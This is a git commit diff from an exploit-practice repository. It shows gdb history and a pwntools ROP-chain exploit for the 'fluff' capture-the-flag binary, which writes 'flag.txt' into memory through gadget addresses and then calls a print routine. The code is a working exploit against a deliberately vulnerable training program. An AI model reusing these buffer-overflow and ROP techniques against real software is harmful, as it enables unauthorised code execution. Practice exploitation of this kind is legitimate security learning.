deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
This commit is contained in:
Brett Weiland
parent
4c25bd9188
commit
406768c5fe
Binary file not shown.
@ -1,19 +1,4 @@
|
|||||||
quit
|
quit
|
||||||
quit
|
|
||||||
continue
|
|
||||||
nexti
|
|
||||||
nexti
|
|
||||||
info reg rdi
|
|
||||||
stepi
|
|
||||||
nexti
|
|
||||||
info reg rcx
|
|
||||||
nexti
|
|
||||||
info reg rbx
|
|
||||||
stepi
|
|
||||||
info reg rdx
|
|
||||||
inro reg rbx
|
|
||||||
info reg rbx
|
|
||||||
quit
|
|
||||||
stepi
|
stepi
|
||||||
continue
|
continue
|
||||||
stepi
|
stepi
|
||||||
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
|
|||||||
x/x 0x601be0 + 9
|
x/x 0x601be0 + 9
|
||||||
x/x 0x601be0 + 10
|
x/x 0x601be0 + 10
|
||||||
quit
|
quit
|
||||||
|
continue
|
||||||
|
context
|
||||||
|
x/x 0x7fff0b74fed0
|
||||||
|
x/100x 0x7fff0b74fed0
|
||||||
|
quit
|
||||||
|
break *0x400639
|
||||||
|
continue
|
||||||
|
context
|
||||||
|
continue
|
||||||
|
x/s 0x601be0
|
||||||
|
continue
|
||||||
|
x/s 0x601be0
|
||||||
|
stepi
|
||||||
|
stepi
|
||||||
|
x/s 0x601be0
|
||||||
|
quit
|
||||||
|
continue
|
||||||
|
continue
|
||||||
|
quit
|
||||||
|
break *0x00000000004006a3
|
||||||
|
continue
|
||||||
|
continue
|
||||||
|
quit
|
||||||
|
break pwnme
|
||||||
|
run
|
||||||
|
continue
|
||||||
|
break *0x00000000004006a3
|
||||||
|
continue
|
||||||
|
info reg rip
|
||||||
|
continue
|
||||||
|
info reg rip
|
||||||
|
quit
|
||||||
|
|||||||
Binary file not shown.
@ -13,37 +13,35 @@ letter_lookups = {
|
|||||||
def write_str(dest, string, payload):
|
def write_str(dest, string, payload):
|
||||||
payload += p64(0x00000000004006a3)
|
payload += p64(0x00000000004006a3)
|
||||||
payload += p64(dest)
|
payload += p64(dest)
|
||||||
for c in string:
|
payload += p64(0x0000000000400610)
|
||||||
payload += p64(0x40062a)
|
payload += p64(1)
|
||||||
payload += p64(0x4000) # if things go wrong, check endian/order
|
payload += p64(0x40062a)
|
||||||
|
payload += p64(0x4000)
|
||||||
|
payload += p64(letter_lookups[string[0]] - 0x3ef2)
|
||||||
|
payload += p64(0x400628)
|
||||||
|
payload += p64(0x400639)
|
||||||
|
|
||||||
|
|
||||||
|
for c in string[1:]:
|
||||||
|
payload += p64(0x40062b)
|
||||||
payload += p64(letter_lookups[c] - 0x3ef2)
|
payload += p64(letter_lookups[c] - 0x3ef2)
|
||||||
|
|
||||||
payload += p64(0x0000000000400610)
|
payload += p64(0x0000000000400610)
|
||||||
payload += p64(0)
|
payload += p64(1)
|
||||||
|
|
||||||
payload += p64(0x400628)
|
payload += p64(0x400628)
|
||||||
|
|
||||||
payload += p64(0x400639)
|
payload += p64(0x400639)
|
||||||
|
|
||||||
return(payload)
|
return(payload)
|
||||||
|
|
||||||
|
|
||||||
prog = gdb.debug('./fluff', gdbscript='''
|
prog = process('./fluff')
|
||||||
break *pwnme + 151
|
|
||||||
'''
|
|
||||||
)
|
|
||||||
payload = b''
|
payload = b''
|
||||||
for c in range(40):
|
for c in range(40):
|
||||||
payload += b'a'
|
payload += b'a'
|
||||||
|
|
||||||
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
||||||
payload += p64(0x00000000004006a3)
|
payload += p64(0x00000000004006a3)
|
||||||
payload += p64(0x601be0) # set rdi
|
payload += p64(0x601be0)
|
||||||
|
|
||||||
payload += p64(0x0000000000400510)
|
payload += p64(0x0000000000400510)
|
||||||
|
|
||||||
payload += b"\n"
|
|
||||||
prog.sendline(payload)
|
prog.sendline(payload)
|
||||||
sleep(1)
|
|
||||||
print(str(prog.recv(), 'UTF-8'))
|
|
||||||
prog.interactive()
|
prog.interactive()
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user